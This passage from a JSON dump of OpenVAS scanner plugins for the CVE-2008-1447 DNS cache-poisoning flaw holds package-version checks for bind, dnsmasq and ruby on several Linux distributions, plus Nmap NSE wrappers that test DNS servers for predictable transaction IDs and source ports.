= 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.3.5_P1-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.4.2_P1-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"bind\", ver:\"9.4.2_P1-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-27T10:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of dnsmasq", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870106", "href": "http://plugins.openvas.org/nasl.php?oid=870106", "type": "openvas", "title": "RedHat Update for dnsmasq RHSA-2008:0789-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dnsmasq RHSA-2008:0789-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed to\n provide DNS and, optionally, DHCP, to a small network.\n\n The dnsmasq DNS resolver used a fixed source UDP port. This could have made\n DNS spoofing attacks easier. dnsmasq has been updated to use random UDP\n source ports, helping to make DNS spoofing attacks harder. (CVE-2008-1447)\n \n All dnsmasq users are advised to upgrade to this updated package, that\n upgrades dnsmasq to version 2.45, which resolves this issue.\";\n\ntag_affected = \"dnsmasq on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-August/msg00005.html\");\n script_id(870106);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"RHSA\", value: \"2008:0789-01\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"RedHat Update for dnsmasq RHSA-2008:0789-01\");\n\n script_summary(\"Check for the Version of dnsmasq\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dnsmasq\", rpm:\"dnsmasq~2.45~1.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dnsmasq-debuginfo\", rpm:\"dnsmasq-debuginfo~2.45~1.el5_2.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see the references). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.", "modified": "2020-07-07T00:00:00", "published": "2013-02-28T00:00:00", "id": "OPENVAS:1361412562310803552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803552", "type": "openvas", "title": "Nmap NSE 6.01: dns-random-txid", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script:\n# Script: Brandon Enright <bmenrigh@ucsd.edu>\\n\n# txidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803552\");\n script_version(\"2020-07-07T13:54:18+0000\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-07 13:54:18 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-02-28 19:00:41 +0530 (Thu, 28 Feb 2013)\");\n script_name(\"Nmap NSE 6.01: dns-random-txid\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2013 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n\n script_xref(name:\"URL\", value:\"https://www.dns-oarc.net/oarc/services/txidtest\");\n\n script_tag(name:\"summary\", value:\"Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values\ncan make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see the references). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition\nyour IP address will be sent along with the txidtest query to the DNS server running on the target.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2018-04-09T11:40:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of bind", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880254", "type": "openvas", "title": "CentOS Update for bind CESA-2008:0533 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2008:0533 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols.\n\n The DNS protocol protects against spoofing attacks by requiring an attacker\n to predict both the DNS transaction ID and UDP source port of a request. In\n recent years, a number of papers have found problems with DNS\n implementations which make it easier for an attacker to perform DNS\n cache-poisoning attacks.\n \n Previous versions of BIND did not use randomized UDP source ports. If an\n attacker was able to predict the random DNS transaction ID, this could make\n DNS cache-poisoning attacks easier. In order to provide more resilience,\n BIND has been updated to use a range of random UDP source ports.\n (CVE-2008-1447)\n \n Note: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\n and 5 to allow BIND to use random UDP source ports.\n \n Users of BIND are advised to upgrade to these updated packages, which\n contain a backported patch to add this functionality.\n \n Red Hat would like to thank Dan Kaminsky for reporting this issue.\";\n\ntag_affected = \"bind on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-July/015084.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880254\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"CESA\", value: \"2008:0533\");\n script_cve_id(\"CVE-2008-1447\");\n script_name( \"CentOS Update for bind CESA-2008:0533 centos3 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.4~22.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:51:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-334-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:61947", "href": "http://plugins.openvas.org/nasl.php?oid=61947", "type": "openvas", "title": "Slackware Advisory SSA:2008-334-01 ruby", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_334_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New ruby packages are available for Slackware 11.0, 12.0, and 12.1 to\nfix bugs and a security issue.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2008-334-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-334-01\";\n \nif(description)\n{\n script_id(61947);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2008-334-01 ruby \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"ruby\", ver:\"1.8.6_p287-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ruby\", ver:\"1.8.6_p287-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ruby\", ver:\"1.8.6_p287-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.", "modified": "2017-03-06T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:104103", "href": "http://plugins.openvas.org/nasl.php?oid=104103", "type": "openvas", "title": "Nmap NSE net: dns-random-srcport", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_dns_random_srcport_net.nasl 5499 2017-03-06 13:06:09Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: \n# Script: Brandon Enright <bmenrigh@ucsd.edu>\n# porttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n#\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can\nmake a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-\noarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will\nbe sent to and potentially recorded by one or more DNS servers and the porttest server. In addition\nyour IP address will be sent along with the porttest query to the DNS server running on the target.\";\n\nif(description)\n{\n script_id(104103);\n script_version(\"$Revision: 5499 $\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-06 14:06:09 +0100 (Mon, 06 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Nmap NSE net: dns-random-srcport\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n# The corresponding NSE script does't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n\n nmap_nse_register(script:\"dns-random-srcport\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"dns-random-srcport\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (dns-random-srcport.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Oracle Linux Local Security Checks ELSA-2008-0533", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122571", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2008-0533", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2008-0533.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122571\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:48:21 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2008-0533\");\n script_tag(name:\"insight\", value:\"ELSA-2008-0533 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2008-0533\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2008-0533.html\");\n script_cve_id(\"CVE-2008-1447\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.0.1.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.4~6.0.2.P1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy\", rpm:\"selinux-policy~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy-devel\", rpm:\"selinux-policy-devel~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy-mls\", rpm:\"selinux-policy-mls~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy-strict\", rpm:\"selinux-policy-strict~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"selinux-policy-targeted\", rpm:\"selinux-policy-targeted~2.4.6~137.1.el5_2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-25T10:57:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880195", "href": "http://plugins.openvas.org/nasl.php?oid=880195", "type": "openvas", "title": "CentOS Update for bind CESA-2008:0533 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2008:0533 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols.\n\n The DNS protocol protects against spoofing attacks by requiring an attacker\n to predict both the DNS transaction ID and UDP source port of a request. In\n recent years, a number of papers have found problems with DNS\n implementations which make it easier for an attacker to perform DNS\n cache-poisoning attacks.\n \n Previous versions of BIND did not use randomized UDP source ports. If an\n attacker was able to predict the random DNS transaction ID, this could make\n DNS 